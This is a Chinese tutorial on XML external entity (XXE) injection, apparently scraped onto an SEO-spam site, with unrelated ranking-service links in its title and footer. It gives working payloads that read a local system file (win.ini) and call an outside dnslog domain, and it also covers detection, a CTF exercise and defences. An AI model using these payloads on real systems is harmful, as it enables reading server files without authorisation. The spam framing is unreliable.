当前位置: 首页 > news >正文

专门做优惠券的网站排名软件

专门做优惠券的网站,排名软件,广州手机网站制作咨询,做外围什么网站有客户一、概述 1、XXE:XML外部实体注入攻击 2、XML:可扩展标记语言。 (1)没有固定标签,所有标签都可以自定义,但有限制规则。 (2)用于数据对的传输与存储,常被用于充当配置文件 推荐教程:XML 教程 (3)后缀…

一、概述

1、XXE:XML外部实体注入攻击

2、XML:可扩展标记语言。

(1)没有固定标签,所有标签都可以自定义,但有限制规则。

(2)用于数据对的传输与存储,常被用于充当配置文件

推荐教程:XML 教程

(3)后缀名:*.xml

(4)语法规则:格式正确完整

3、XXE攻击原理:攻击者通过恶意的外部实体,当解析者解析包含恶意外部实体且未对其进行过滤,造成命令执行,目录遍历。

二、利用

1、存在:

  • 看URL是.ashx后缀
  • 存在明显的XML标签
  • 是POST请求,content-type:application/xml、text/xml、application/json(发现更改为application/xml看看)

2、限制条件:是否开启外部实体解析

3、攻击方式:有回显和无回显(盲攻击)

4、Payload:

#尝试,判断漏洞存在
<?xml version="1.0"?>
<!DOCTYPE info [
<!ENTITY xxe "你好" > ]>
<info>&xxe;</info>
#利用
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM
"file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

5、利用dnslog判断是否存在xxe漏洞(靶场pikachu-xxe漏洞)

(1)、修改payload

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE info [
<!ENTITY xxe SYSTEM
"http://dnslog.cn暂时域名" >
]>
<info>&xxe;</info>

(2)、回到dnslog网址看是否有域名解析了

6、练习(ctf题目):http://web.jarvisoj.com:9882/

7、思路

  • 无回显,BP抓包
  • 判断是否存在xxe漏洞
  • 深度利用

三、补充

1、工具:XXE injector

资料:https://www.cnblogs.com/AgainKjh/p/14639186.html

2、防御

  • 升级版本,禁止外部实体解析
  • 过滤用户提交的数据
http://www.khdw.cn/news/35461.html

相关文章:

  • 重庆网站建设科技公司福州网站排名推广
  • 做中学网站站长查询站长工具
  • 武邑网站建设seo 是什么
  • 拓展公司镇江seo快速排名
  • 网站相似度检测 站长重庆网站网络推广
  • 做一个网站花2万贵吗公司优化是什么意思?
  • 专门做干果批发的网站优质外链平台
  • 可以做fiting网站营销手段和技巧
  • 网站备案前置审批文件武汉seo收费
  • 做图网站有哪些东莞seo外包
  • 中国招标网官方网泉州seo
  • alexa怎么查询网站排名seo推广绩效考核指标是什么
  • 美团网网站建设 费用百度官方免费下载安装
  • unsplash素材网站海口网站关键词优化
  • wordpress调用某指定分类栏目排名轻松seo 网站
  • 网站关键词seo费用网络推广有多少种方法
  • 阿里自助建站平台网店关键词怎么优化
  • wordpress官网登录搜索引擎优化缩写
  • 做yield网站多少钱成都百度推广和seo优化
  • 2015年全球网站优秀设计师长沙营销型网站建设
  • 什么是高端网站建设广告联盟平台排名
  • 电子商务是建网站深圳网站制作推广
  • 政府网站建设自查soso搜搜
  • 山西做网站的公司哪个好2021年近期舆情热点话题
  • wordpress 用户水印重庆seo
  • 给别人做网站多少钱vue seo 优化方案
  • 江苏省交通建设监理协会网站百度收录情况查询
  • 网站301定向怎样在百度上发布作品
  • 百姓网网站开发的意义软文广告经典案例
  • 花店网站建设方案关键词优化师